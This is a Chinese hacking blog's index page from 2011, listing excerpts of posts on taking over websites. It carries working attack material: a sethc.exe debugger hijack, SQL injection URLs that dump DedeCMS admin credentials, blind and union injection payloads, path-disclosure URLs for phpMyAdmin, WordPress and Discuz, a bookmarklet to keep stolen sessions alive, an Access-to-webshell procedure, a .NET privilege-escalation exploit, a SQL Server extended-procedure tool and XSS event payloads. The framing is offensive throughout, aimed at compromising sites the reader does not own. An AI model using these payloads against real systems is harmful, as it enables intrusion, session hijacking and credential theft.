2011年4月27日

入侵常用vbs提权

摘要: 3389端口查询 Dim ReadComputerName Set ReadComputerName=WScript.CreateObject("WScript.Shell") Dim TSName,TSRegPath TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber" TSName=ReadComputerName.RegRead(TSRegPath) WScript.Echo("TermService 阅读全文

posted @ 2011-04-27 13:12 小宝哥哥 阅读(642) 评论(0) 推荐(1) 编辑

命令行下操作注册表劫持sethc提权

摘要: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"/v debugger /d taskmgr.exe /fWindows 控制台注册表工具 - 版本 3.0格式就是:REG Operation 参数列表返回代码: 0 - 成功 1 - 失败 (除了 REG COMPARE)Operation 有11个,可以这样得到帮助:REG Operation /?REG QUERYREG ADDREG DELETEREG COPYREG S 阅读全文

posted @ 2011-04-27 13:06 小宝哥哥 阅读(679) 评论(0) 推荐(0) 编辑

星外虚拟主机可写目录总结

摘要: C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\C:\php\PEAR\C:\Program Files\Zend\ZendOptimizer-3.3.0\ C:\Program Files\Common Files\C:\7i24.com\iissafe\log\ C:\RECYCLERC:\windows\temp\ c:\Program Files\Microsoft SQL Server\90\Shared\ErrorDumps\e:\recycler\f:\recycler\C:\P 阅读全文

posted @ 2011-04-27 12:37 小宝哥哥 阅读(236) 评论(0) 推荐(0) 编辑

辛苦整理的各类网站系统暴物理路径漏洞

摘要: Phpmyadmin暴路径:phpmyadmin/libraries/select_lang.lib.php 得到物理路径phpmyadmin/themes/darkblue_orange/layout.inc.phpphpmyadmin/index.php?lang[]=1phpMyAdmin/phpinfo.phpphpmyadmin/libraries/mcrypt.lib.phpphpmyadmin/libraries/export/xls.phpphpmyadmin/libraries/lect_lang.lib.phpPhpmyadmin最新重定向漏洞:error.php?type 阅读全文

posted @ 2011-04-27 04:02 小宝哥哥 阅读(2203) 评论(0) 推荐(1) 编辑

google hack渗透全过程

摘要: 利用google完全是可以对一个站点进行信息收集和渗透的,下面我们用google对特定站点进行一次测试。------------------------------------------------首先用google先看这个站点的一些基本情况(一些细节部分就略去了):site:xxxx.com从返回的信息中,找到几个该校的几个系院的域名:http//a1.xxxx.comhttp//a2.xxxx.comhttp//a3.xxxx.comhttp//a4.xxxx.com顺便ping了一下,应该是在不同的服务器.学校一般都会有不少好的资料,先看看有什么好东西没site:xxxx.com fi 阅读全文

posted @ 2011-04-27 04:01 小宝哥哥 阅读(847) 评论(0) 推荐(0) 编辑

维持Session的另类方法

摘要: 拿到偷到的session登陆后,再地址栏敲入下面代码,即可保证session不被服务器因超时注销.javascript:(function%20sogili()%20%7B%0A%20%20%20%20setInterval(function%20()%20%7B_%20%3D%20new%20XMLHttpRequest%20%7C%7C%20new%20ActiveXObject(%22Microsoft.XMLHTTP%22)%3B_.open(%22GET%22%2C%20location)%3B_.send(null)%3B%7D%2C%2060000)%3B%0A%7D)();这段 阅读全文

posted @ 2011-04-27 03:57 小宝哥哥 阅读(140) 评论(0) 推荐(0) 编辑

当网站不能上传asp,asa时

摘要: 当网站不允许上传asp cer cdx htr等文件时, 上传一个stm文件, 内容为:<!--#include file="conn.asp"-->直接请求这个stm文件, conn.asp就一览无遗, 数据库路径也就到手啦! 并且又看了那篇shtml的介绍后,恍然大悟,终于明白了!原来就是如上所说的,<!--#include file="conn.asp"-->就是一条SSI指令,其作用是将"info.htm"的内容拷贝到当前的页面中,当访问者来浏览时,会看到其它HTML文档一样显示info.htm其中的内 阅读全文

posted @ 2011-04-27 03:56 小宝哥哥 阅读(818) 评论(0) 推荐(0) 编辑

ASP绕过防注入的新思路

摘要: 要想绕过防注入,就要打碎关键字。假如有类似这么一段防注入代码:<%id=request("id")id=replace(id,"and","")··· ··· //过滤其它的危险关键字id=replace(id," ","")id=replace(id,",","")//过滤空格和逗号,这是使用本方法必须的条件%>你还有办法注入吗?以打碎关键字“and"为例,咱大可以这样:t 阅读全文

posted @ 2011-04-27 03:47 小宝哥哥 阅读(585) 评论(0) 推荐(0) 编辑

PHP站点渗透常用搜集信息

摘要: 当你看到一个php站点时候除了在google上利用site,filetype等常用办法收集网站物理路径信息的同时不妨尝试一下以下办法,有时候会有意想不到的收获(前面加网站的url): /phpinfo.php *显示php配置信息 /test.php *有些网站管理员架设好php网站的测试页面,里面通常都是phpinfo的信息 /info.php *有些php网站系统自带的,可以显示php配置信息 /help.php *有些php网站目录自带的/ok.php/php.php /setup.php*有些php网站系统安装目录自带的,有时会报错 /install.php /config/phpin 阅读全文

posted @ 2011-04-27 03:44 小宝哥哥 阅读(607) 评论(0) 推荐(0) 编辑

DedeCMS注入爆管理员用户密码方法

摘要: 搜索关键词:powered by dedecms首先注册个用户,注册地址:/member/index_do.php?fmdo=user&dopost=regnew 爆管理帐号:/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%20%23@__admin/* 爆管理员密码/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2, 阅读全文

posted @ 2011-04-27 03:42 小宝哥哥 阅读(563) 评论(0) 推荐(0) 编辑

php爆绝对路径的几种方法

摘要: dz 爆绝对路径/uc_server/control/admin/db.php/ucenter/control/admin/db.php/manyou/admincp.php?my_suffix=%0A%0DTOBY57/manyou/userapp.php?%0D%0A=TOBY57WordPress的平台,爆绝对路径的方法是:url/wp-admin/includes/admin.phpurl/wp-content/plugins/akismet/akismet.phpurl/wp-content/plugins/akismet/hello.phpphpMyAdmin暴路径办法:phpMy 阅读全文

posted @ 2011-04-27 03:41 小宝哥哥 阅读(1315) 评论(0) 推荐(1) 编辑

php注入基本步骤

摘要: php注入十点基本步骤1、判断是否存在注入,加'、and 1=1、and 1=22、判断版本and ord(mid(version(),1,1))>51/* 返回正常说明是4.0以上版本,可以用union查询3、利用order by 暴字段,在网址后加 order by 10/* 如果返回正常说明字段大于104、再利用union来查询准确字段,如: and 1=2 union select 1,2,3,......./* 直到返回正常报出数字,说明猜到准确字段数。如过滤了空格可以用/**/代替。(可在分别用user()、database()、version()进行替换报出的数字进 阅读全文

posted @ 2011-04-27 03:41 小宝哥哥 阅读(261) 评论(0) 推荐(0) 编辑

拿站时的零碎技巧

摘要: 1、对提交的变量做更改刻绕过防注入:例如:asp?nid=1 可更换为 asp?n%69d=1 2、利用load_file()时.当php环境magic_quote设置为on时,所有的单引号.双引号.反斜杠和null字符都会被加上一个反斜杠进行转意.把需要load的内容转换为16禁止即可.形式:0x633A5C626F6F742E696E69 'c:/boot.ini' 阅读全文

posted @ 2011-04-27 03:40 小宝哥哥 阅读(124) 评论(0) 推荐(0) 编辑

渗透经典命令

摘要: 1:CMD下修改IP地址c:\netshc:\netsh>interfacec:\netsh\interface>ipc:\netsh\interface\ip>dump 显示配置情况netsh -c interface ip dump >c:\ip.txtnetsh interface ip dump >c:\ip.txtnetsh -f c:\ip.txt2:tasklist /svc 任务列表3:taskkill TASKKILL /F /IM notepad.exe /IM mspaint.exe4:systeminfo 显示系统详细信息 set 系统变量 阅读全文

posted @ 2011-04-27 03:38 小宝哥哥 阅读(244) 评论(0) 推荐(0) 编辑

Access库利用后台SQL执行导出webshell渗透

摘要: 今天渗透了一个站点,后台有能执行sql语句的地方,恰好又得到了网站物理路径。以前看到网上有用access导出shell的方法,原理大致和php网站的outfile差不多先将一句话写到数据库中,然后再通过语句写到文件中。这里要将数据表内容导出到一个EXCEL文件中,因为ACCESS数据库不允许导出其他危险格式。我们导出为EXCEL后再利用IIS解析漏洞就可以用客户端连接了需要执行如下操作:(1)create table a (b varchar(50))建立一个有一个b字段的表,表名为a,字段类型为字符,长度为50(2)insert into a (b) values('<%exe 阅读全文

posted @ 2011-04-27 03:36 小宝哥哥 阅读(336) 评论(0) 推荐(0) 编辑

盲注技术讲解

摘要: 判断版本号 http://www.xxx.net/goods.php?id=352&wsid=1%20and%20(1,1)>(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23判断系统http://www.xxx.net/goods.php?id=352&wsid=1%20and%20(1,1)>(select 阅读全文

posted @ 2011-04-27 03:33 小宝哥哥 阅读(183) 评论(0) 推荐(0) 编辑

.net最新提权0day,通杀windows

摘要: ps:这个可以一次编译成功,不用改啦……来自:http://www.exploit-db.com/exploits/16940/exploit-db比较厚道的,不在编译上难为小菜啦……/*# Exploit Title: .NET Runtime Optimization Service Privilege Escalation# Date: 03-07-2011# Author: XenoMuta <xenomuta@tuxfamily.org># Version: v2.0.50727# Tested on: Windows XP (sp3), 2003 R2, 7# CVE 阅读全文

posted @ 2011-04-27 03:31 小宝哥哥 阅读(434) 评论(0) 推荐(0) 编辑

xp_hello.dll(sa) 提权工具

摘要: 主要代码:在VC6里面新建一个储存过程项目,在proc.cpp中写入如下代码:#include <stdafx.h>#include <shellapi.h>#define XP_NOERROR 0#define XP_ERROR 1#define MAXCOLNAME 25#define MAXNAME 25#define MAXTEXT 255#ifdef __cplusplusextern “C” {#endifRETCODE __declspec(dllexport) xp_hello(SRV_PROC *srvproc);#ifdef __cplusplus} 阅读全文

posted @ 2011-04-27 03:27 小宝哥哥 阅读(257) 评论(0) 推荐(0) 编辑

32个触发事件XSS语句的总结

摘要: 1、onmouseenter:当鼠标进入选区执行代码<div style="background-color:red" onmouseenter="alert('bem')">123456</div>2、onmouseleave:当鼠标离开选区执行代码<DIV onmouseleave="alert('bem')" style="BACKGROUND-COLOR: red">123456</DIV>3、onmousewheel:当鼠标在 阅读全文

posted @ 2011-04-27 03:18 小宝哥哥 阅读(585) 评论(0) 推荐(0) 编辑

特殊的TXT挂马

摘要: 我们平常挂马无外乎就那么几种方式,如框架挂马、js挂马、css挂马.txt不是文本文件吗?它如何挂马?且听我慢慢道来,很简单的说.如果有人给你发个一个类似http://www.safeclub.tk/test.txt的链接,你敢不敢打开?如果你觉得这只是一个txt文件,打开就打开,没有什么好怕的,那是因为你还没听说过txt文件挂马,如果你听说过,那么你就不会这么大胆了.我们把以下代码保存为test.txtPS:为了显示,所以把width,height的值才设的那么大的.真正挂马的话最好设成0然后把test.txt上传到web空间中,访问一下.这可能要算浏览器的一个小BUG,在txt文件中只要加 阅读全文

posted @ 2011-04-27 02:59 小宝哥哥 阅读(206) 评论(0) 推荐(0) 编辑

导航

Tasup